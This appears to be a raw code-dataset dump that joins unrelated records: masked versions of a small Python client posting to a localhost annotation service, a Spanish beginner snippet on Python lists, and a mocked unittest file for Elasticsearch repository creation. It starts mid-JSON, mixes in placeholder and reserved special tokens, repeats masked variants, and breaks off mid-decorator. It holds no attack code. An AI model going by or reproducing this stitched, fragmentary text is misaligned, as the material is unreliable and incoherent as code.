"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass RequestAnnotation:\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass RequestAnnotation:\n\n def schedule(self, command: str, **kwargs):\n response = requests.post(url=\n f'http://localhost:{config.annotation_port}/{command}', json=kwargs\n )\n return json.loads(response.text)\n",
"step-4": "import json\nimport requests\nimport config\n\n\nclass RequestAnnotation:\n\n def schedule(self, command: str, **kwargs):\n response = requests.post(url=\n f'http://localhost:{config.annotation_port}/{command}', json=kwargs\n )\n return json.loads(response.text)\n",
"step-5": "import json\n\nimport requests\nimport config\n\nclass RequestAnnotation:\n def schedule(self,\n command: str,\n **kwargs):\n response = requests.post(url=f\"http://localhost:{config.annotation_port}/{command}\",\n json=kwargs)\n\n # not 'text' for annotating, but 'text' of response is meant here:\n return json.loads(response.text)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
print(miLista)
<|reserved_special_token_0|>
print(miLista)
miLista.append('NuevoDato')
print(miLista)
<|reserved_special_token_1|>
miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]
print(miLista)
miLista[2] = 3.8
print(miLista)
miLista.append('NuevoDato')
print(miLista)
<|reserved_special_token_1|>
#Las listas son similares a las tuplas
# con la diferencia de que permiten modificar los datos una vez creados
miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]
print (miLista)
miLista[2] = 3.8 #el tercer elemento ahora es 3.8
print(miLista)
miLista.append('NuevoDato')
print(miLista)
|
flexible
|
{
"blob_id": "27ec06d084bf819383801be0351c04e7d1fc1752",
"index": 5176,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nprint(miLista)\n<mask token>\nprint(miLista)\nmiLista.append('NuevoDato')\nprint(miLista)\n",
"step-3": "miLista = ['cadena', 21, 2.8, 'nuevo dato', 25]\nprint(miLista)\nmiLista[2] = 3.8\nprint(miLista)\nmiLista.append('NuevoDato')\nprint(miLista)\n",
"step-4": "#Las listas son similares a las tuplas\n# con la diferencia de que permiten modificar los datos una vez creados\nmiLista = ['cadena', 21, 2.8, 'nuevo dato', 25]\nprint (miLista)\nmiLista[2] = 3.8 #el tercer elemento ahora es 3.8\nprint(miLista)\nmiLista.append('NuevoDato')\nprint(miLista)\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
#!/usr/bin/python
# Classification (U)
"""Program: elasticsearchrepo_create_repo.py
Description: Unit testing of create_repo in
elastic_class.ElasticSearchRepo class.
Usage:
test/unit/elastic_class/elasticsearchrepo_create_repo.py
Arguments:
"""
# Libraries and Global Variables
# Standard
import sys
import os
if sys.version_info < (2, 7):
import unittest2 as unittest
else:
import unittest
# Third-party
import mock
# Local
sys.path.append(os.getcwd())
import elastic_class
import version
__version__ = version.__version__
class Elasticsearch(object):
"""Class: ElasticSearch
Description: Class representation of the Elasticsearch class.
Methods:
__init__
"""
def __init__(self, host_list, port=9200):
"""Method: __init__
Description: Initialization instance of the class.
Arguments:
"""
self.hosts = host_list
self.port = port
self.info_status = {"cluster_name": "ClusterName",
"name": "servername"}
class UnitTest(unittest.TestCase):
    """Class: UnitTest

    Description: Unit tests for elastic_class.ElasticSearchRepo.create_repo.
        Every test patches the elasticsearch client and the repo-list
        helpers so no live cluster is required.

    Methods:
        setUp
        test_not_created_repo
        test_not_detected_repo
        test_missing_repo_name
        test_no_repo_dir
        test_no_repo_name
        test_default

    """

    def setUp(self):
        """Function: setUp

        Description: Initialization for unit testing.

        Arguments:

        """
        # Fixture hosts and repository names shared by all tests.
        self.host_list = ["host1", "host2"]
        self.repo = "reponame"
        self.repo2 = "reponame2"
        self.repo3 = "reponame3"
        # Stub client instance handed back by the patched Elasticsearch class.
        self.els = Elasticsearch(self.host_list)
        self.repo_dir = "/dir/path/dump2"
        # NOTE(review): nodes_data, health_data and repo_list are not
        # referenced by any test in this class -- presumably carried over
        # from a sibling test module; confirm before removing.
        self.nodes_data = {"serverid1": {"name": "hostname1", "settings":
                           {"path": {"data": ["/dir/data1"],
                                     "logs": ["/dir/logs1"]}}},
                           "serverid2": {"name": "hostname2", "settings":
                           {"path": {"data": ["/dir/data2"],
                                     "logs": ["/dir/logs2"]}}}}
        self.health_data = {"status": "green", "cluster_name": "ClusterName"}
        self.dump = "/dir/path/dump"
        self.repo_list = {"reponame": {"type": "dbdump", "settings":
                          {"location": self.dump}}}
        # repo_dict: repo listing before the create; repo_dict2: listing
        # after a successful create (adds "reponame2").
        self.repo_dict = {"reponame": {"type": "dbdump", "settings":
                          {"location": self.dump}}}
        self.repo_dict2 = {"reponame": {"type": "dbdump", "settings":
                           {"location": self.dump}},
                           "reponame2": {"type": "dbdump", "settings":
                           {"location": "/dir/path/dump2"}}}

    # Patches are applied bottom-up: the innermost decorator
    # (elasticsearch.Elasticsearch) is injected first as mock_es, then
    # get_repo_list as mock_repo.
    @mock.patch("elastic_class.create_snapshot_repo",
                mock.Mock(return_value={"acknowledged": False}))
    @mock.patch("elastic_class.ElasticSearch.update_status",
                mock.Mock(return_value=True))
    @mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
    @mock.patch("elastic_class.get_repo_list")
    @mock.patch("elastic_class.elasticsearch.Elasticsearch")
    def test_not_created_repo(self, mock_es, mock_repo):
        """Function: test_not_created_repo

        Description: Test with repository not created (snapshot-repo call
            returns acknowledged=False).

        Arguments:
            (input) mock_es -> Mock of elasticsearch.Elasticsearch.
            (input) mock_repo -> Mock of elastic_class.get_repo_list.

        """
        mock_es.return_value = self.els
        # First repo listing is returned during connect(), the second after
        # the create attempt -- presumably; matches side_effect order.
        mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
        els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
                                              repo_dir=self.repo_dir)
        els.connect()
        # NOTE(review): sibling test test_missing_repo_name clears
        # els.repo instead of els.repo_name -- confirm which attribute
        # create_repo actually reads.
        els.repo_name = None

        # Expected message keeps the double space produced by the
        # ": " + " reponame3" concatenation.
        self.assertEqual(
            els.create_repo(self.repo3, self.repo_dir),
            (True,
             "ERROR: Repository creation failure: " +
             " reponame3, /dir/path/dump2"))

    @mock.patch("elastic_class.create_snapshot_repo",
                mock.Mock(return_value={"acknowledged": True}))
    @mock.patch("elastic_class.ElasticSearch.update_status",
                mock.Mock(return_value=True))
    @mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
    @mock.patch("elastic_class.get_repo_list")
    @mock.patch("elastic_class.elasticsearch.Elasticsearch")
    def test_not_detected_repo(self, mock_es, mock_repo):
        """Function: test_not_detected_repo

        Description: Test with repository not detected -- the create is
            acknowledged but "reponame3" never appears in the post-create
            repo listing (side_effect still yields repo_dict2, which lacks
            it).

        Arguments:
            (input) mock_es -> Mock of elasticsearch.Elasticsearch.
            (input) mock_repo -> Mock of elastic_class.get_repo_list.

        """
        mock_es.return_value = self.els
        mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
        els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
                                              repo_dir=self.repo_dir)
        els.connect()
        els.repo_name = None

        self.assertEqual(
            els.create_repo(self.repo3, self.repo_dir),
            (True,
             "ERROR: Repository not detected: reponame3, /dir/path/dump2"))

    @mock.patch("elastic_class.create_snapshot_repo",
                mock.Mock(return_value={"acknowledged": False}))
    @mock.patch("elastic_class.ElasticSearch.update_status",
                mock.Mock(return_value=True))
    @mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
    @mock.patch("elastic_class.get_repo_list")
    @mock.patch("elastic_class.elasticsearch.Elasticsearch")
    def test_missing_repo_name(self, mock_es, mock_repo):
        """Function: test_missing_repo_name

        Description: Test with missing repo named -- repo attribute cleared
            and no repo name argument supplied, so create_repo should fail
            fast with the missing-name error.

        Arguments:
            (input) mock_es -> Mock of elasticsearch.Elasticsearch.
            (input) mock_repo -> Mock of elastic_class.get_repo_list.

        """
        mock_es.return_value = self.els
        mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
        els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
                                              repo_dir=self.repo_dir)
        els.connect()
        els.repo = None

        self.assertEqual(
            els.create_repo(repo_dir=self.repo_dir),
            (True,
             "ERROR: Missing repo name or" +
             " directory: 'None', '/dir/path/dump2'"))

    @mock.patch("elastic_class.create_snapshot_repo",
                mock.Mock(return_value={"acknowledged": True}))
    @mock.patch("elastic_class.ElasticSearch.update_status",
                mock.Mock(return_value=True))
    @mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
    @mock.patch("elastic_class.get_repo_list")
    @mock.patch("elastic_class.elasticsearch.Elasticsearch")
    def test_no_repo_dir(self, mock_es, mock_repo):
        """Function: test_no_repo_dir

        Description: Test with no repo directory passed -- create_repo is
            expected to fall back to the instance's repo_dir and succeed.

        Arguments:
            (input) mock_es -> Mock of elasticsearch.Elasticsearch.
            (input) mock_repo -> Mock of elastic_class.get_repo_list.

        """
        mock_es.return_value = self.els
        mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
        els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
                                              repo_dir=self.repo_dir)
        els.connect()

        self.assertEqual(els.create_repo(self.repo), (False, None))
        # Post-create listing should reflect the second side_effect value.
        self.assertEqual(els.repo_dict, self.repo_dict2)

    @mock.patch("elastic_class.create_snapshot_repo",
                mock.Mock(return_value={"acknowledged": True}))
    @mock.patch("elastic_class.ElasticSearch.update_status",
                mock.Mock(return_value=True))
    @mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
    @mock.patch("elastic_class.get_repo_list")
    @mock.patch("elastic_class.elasticsearch.Elasticsearch")
    def test_no_repo_name(self, mock_es, mock_repo):
        """Function: test_no_repo_name

        Description: Test with no repo named passed -- the instance is
            built with repo2, so create_repo should use that attribute and
            succeed.

        Arguments:
            (input) mock_es -> Mock of elasticsearch.Elasticsearch.
            (input) mock_repo -> Mock of elastic_class.get_repo_list.

        """
        mock_es.return_value = self.els
        mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
        els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo2,
                                              repo_dir=self.repo_dir)
        els.connect()

        self.assertEqual(els.create_repo(repo_dir=self.repo_dir),
                         (False, None))
        self.assertEqual(els.repo_dict, self.repo_dict2)

    @mock.patch("elastic_class.create_snapshot_repo",
                mock.Mock(return_value={"acknowledged": True}))
    @mock.patch("elastic_class.ElasticSearch.update_status",
                mock.Mock(return_value=True))
    @mock.patch("elastic_class.is_active", mock.Mock(return_value=True))
    @mock.patch("elastic_class.get_repo_list")
    @mock.patch("elastic_class.elasticsearch.Elasticsearch")
    def test_default(self, mock_es, mock_repo):
        """Function: test_default

        Description: Test with default settings -- explicit name and
            directory, acknowledged create, repo detected afterwards.

        Arguments:
            (input) mock_es -> Mock of elasticsearch.Elasticsearch.
            (input) mock_repo -> Mock of elastic_class.get_repo_list.

        """
        mock_es.return_value = self.els
        mock_repo.side_effect = [self.repo_dict, self.repo_dict2]
        els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.repo,
                                              repo_dir=self.repo_dir)
        els.connect()

        self.assertEqual(els.create_repo(self.repo2, self.repo_dir),
                         (False, None))
        self.assertEqual(els.repo_dict, self.repo_dict2)
# Run the suite (discovers the test_* methods) when executed directly.
if __name__ == "__main__":
    unittest.main()
|
normal
|
{
"blob_id": "5c01b83634b7ae9bc691341d7432a4e59617444c",
"index": 5182,
"step-1": "<mask token>\n\n\nclass Elasticsearch(object):\n <mask token>\n <mask token>\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n 
mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n 
els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n 
return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Elasticsearch(object):\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n self.hosts = host_list\n self.port = port\n self.info_status = {'cluster_name': 'ClusterName', 'name': 'servername'\n }\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n 
@mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n 
@mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_missing_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_missing_repo_name\n\n Description: Test with missing repo named.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo = None\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (True, \n 'ERROR: Missing repo name or' +\n \" directory: 'None', '/dir/path/dump2'\"))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_dir(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_dir\n\n Description: Test with no repo directory passed.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo), (False, None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_no_repo_name(self, mock_es, mock_repo):\n \"\"\"Function: test_no_repo_name\n\n Description: Test with no repo named passed.\n\n Arguments:\n\n \"\"\"\n 
mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo2, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(repo_dir=self.repo_dir), (False, None)\n )\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_default(self, mock_es, mock_repo):\n \"\"\"Function: test_default\n\n Description: Test with default settings.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n self.assertEqual(els.create_repo(self.repo2, self.repo_dir), (False,\n None))\n self.assertEqual(els.repo_dict, self.repo_dict2)\n\n\n<mask token>\n",
"step-3": "<mask token>\nif sys.version_info < (2, 7):\n import unittest2 as unittest\nelse:\n import unittest\n<mask token>\nsys.path.append(os.getcwd())\n<mask token>\n\n\nclass Elasticsearch(object):\n \"\"\"Class: ElasticSearch\n\n Description: Class representation of the Elasticsearch class.\n\n Methods:\n __init__\n\n \"\"\"\n\n def __init__(self, host_list, port=9200):\n \"\"\"Method: __init__\n\n Description: Initialization instance of the class.\n\n Arguments:\n\n \"\"\"\n self.hosts = host_list\n self.port = port\n self.info_status = {'cluster_name': 'ClusterName', 'name': 'servername'\n }\n\n\nclass UnitTest(unittest.TestCase):\n \"\"\"Class: UnitTest\n\n Description: Class which is a representation of a unit testing.\n\n Methods:\n setUp\n test_not_created_repo\n test_not_detected_repo\n test_missing_repo_name\n test_no_repo_dir\n test_no_repo_name\n test_default\n\n \"\"\"\n\n def setUp(self):\n \"\"\"Function: setUp\n\n Description: Initialization for unit testing.\n\n Arguments:\n\n \"\"\"\n self.host_list = ['host1', 'host2']\n self.repo = 'reponame'\n self.repo2 = 'reponame2'\n self.repo3 = 'reponame3'\n self.els = Elasticsearch(self.host_list)\n self.repo_dir = '/dir/path/dump2'\n self.nodes_data = {'serverid1': {'name': 'hostname1', 'settings': {\n 'path': {'data': ['/dir/data1'], 'logs': ['/dir/logs1']}}},\n 'serverid2': {'name': 'hostname2', 'settings': {'path': {'data':\n ['/dir/data2'], 'logs': ['/dir/logs2']}}}}\n self.health_data = {'status': 'green', 'cluster_name': 'ClusterName'}\n self.dump = '/dir/path/dump'\n self.repo_list = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}}\n self.repo_dict2 = {'reponame': {'type': 'dbdump', 'settings': {\n 'location': self.dump}}, 'reponame2': {'type': 'dbdump',\n 'settings': {'location': '/dir/path/dump2'}}}\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n 
return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_created_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_created_repo\n\n Description: Test with repository not created.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository creation failure: ' +\n ' reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': True}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n @mock.patch('elastic_class.is_active', mock.Mock(return_value=True))\n @mock.patch('elastic_class.get_repo_list')\n @mock.patch('elastic_class.elasticsearch.Elasticsearch')\n def test_not_detected_repo(self, mock_es, mock_repo):\n \"\"\"Function: test_not_detected_repo\n\n Description: Test with repository not detected.\n\n Arguments:\n\n \"\"\"\n mock_es.return_value = self.els\n mock_repo.side_effect = [self.repo_dict, self.repo_dict2]\n els = elastic_class.ElasticSearchRepo(self.host_list, repo=self.\n repo, repo_dir=self.repo_dir)\n els.connect()\n els.repo_name = None\n self.assertEqual(els.create_repo(self.repo3, self.repo_dir), (True,\n 'ERROR: Repository not detected: reponame3, /dir/path/dump2'))\n\n @mock.patch('elastic_class.create_snapshot_repo', mock.Mock(\n return_value={'acknowledged': False}))\n @mock.patch('elastic_class.ElasticSearch.update_status', mock.Mock(\n return_value=True))\n 
